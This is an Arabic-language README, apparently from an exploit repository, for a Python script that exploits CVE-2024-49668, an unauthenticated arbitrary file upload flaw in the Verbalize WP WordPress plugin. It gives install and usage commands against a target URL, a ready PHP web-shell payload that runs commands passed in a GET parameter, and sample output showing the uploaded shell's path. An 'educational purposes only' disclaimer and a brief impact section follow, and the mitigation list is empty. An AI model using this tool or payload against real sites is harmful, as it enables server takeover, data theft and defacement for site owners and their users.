
إضافة Verbalize WP لووردبريس <= 1.0 - ثغرة رفع ملفات تعسفي
CVE-2024-49668 هي ثغرة خطيرة في إضافة Verbalize WP لووردبريس الإصدارات 1.0 وما دونها. تسمح هذه الثغرة للمهاجمين غير المصادقين برفع ملفات عشوائية، بما في ذلك شيلات الويب، إلى خادم الويب. تنشأ المشكلة بسبب عدم كفاية التحقق من صحة الإدخال وقيود نوع الملف أثناء رفع الملفات.
يستغل هذا السكربت المكتوب بلغة بايثون الثغرة CVE-2024-49668 لرفع ملف شيل إلى موقع ووردبريس المستهدف باستخدام إضافة Verbalize WP.
readme.txt.requestsقم بتثبيت المكتبة المطلوبة باستخدام pip:
pip install requests
usage:
CVE-2024-49668.py [-h] -u URL [-s SHELL]
تنفيذ طلب POST إلى موقع ووردبريس.
options:
-h, --help إظهار رسالة المساعدة هذه والخروج
-u, --url URL عنوان URL المستهدف
-s, --shell SHELL كود الشيل لرفعه
بشكل افتراضي، سيقوم السكربت برفع شيل PHP ينفذ phpinfo().
python CVE-2024-49668.py -u http://target.com
يمكنك أيضاً تحديد كود شيل PHP مخصص لرفعه:
python CVE-2024-49668.py -u http://target.com -s "<?php system($_GET['cmd']); ?>"
الموقع معرض للخطر. يتم استغلال الإصدار: 1.0. جاري رفع الملف...
مسار الشيل: /wp-content/uploads/audio-text/4091/audio-demo.php
الاستغلال بواسطة: Nxploit, Khaled ALenazi
تمكن الثغرة CVE-2024-49668 المهاجمين من السيطرة الكاملة على الخادم المستهدف عن طريق رفع ملفات ضارة. يمكن أن يؤدي استغلال هذه الثغرة إلى عواقب وخيمة تشمل خروقات البيانات والوصول غير المصرح به والتشويه المحتمل للموقع.
لحماية موقع ووردبريس الخاص بك من هذه الثغرة، يُنصح بما يلي:
هذه الأداة مخصصة للأغراض التعليمية فقط. الاستخدام غير المصرح به لهذه الأداة ضد مواقع الويب دون إذن صريح من المالك غير قانوني. المؤلفون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.
تم الإنشاء في 2025-03-22 بواسطة Nxploited , Khaled alenazi